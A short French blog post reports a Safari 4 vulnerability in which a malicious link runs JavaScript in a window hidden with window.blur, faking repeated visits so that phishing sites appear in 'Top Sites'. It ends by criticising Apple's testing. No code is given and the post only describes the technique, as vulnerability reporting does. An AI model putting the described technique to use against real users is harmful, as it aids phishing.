Inferno de SecureThoughts.com a rapporté une vulnérabilité dans le navigateur Internet Safari 4 de Apple. Cette vulnérabilité assez particulière et unique exploite les fonctionnalitées “Top Sites” et “Cover Flow” introduitent dans Safari 4.

La fonctionnalité “Top Sites” fournit une vue graphique des sites web favoris de l’utilisateur final, permettant ainsi d’accéder rapidement aux sites que l’on accède le plus souvent, comme par exemple eBay, Amazon, Facebook, Gmail, etc.

La vulnérabilité consiste à placer des sites malveillant, par exemple des sites de phishing, dans “Top Sites”, et cette vulnérabilité est exploitable tous simplement en surfant sur Internet, et en cliquant sur un lien malveillant. Un code Javascript basic sera alors exécuté dans une petite fenêtre afin de simuler des navigations répétées sur ces sites web malveillant afin que ceux-ci apparaissent comme populaires. La fenêtre en cause est totalement invisible par le biais de la fonction javascript “window.blur” et l’utilisateur final n’a aucune connaissance de l’attaque en cours.

L’exploit est vraiment basic et il est vraiment regrettable que Apple ne prenne pas la peine d’étudier et de tester au préalable toutes les éventuelles vulnérabilités de ces nouvelles fonctionnalités ou produits. Apple, stp, ne devient pas comme Adobe sad.gif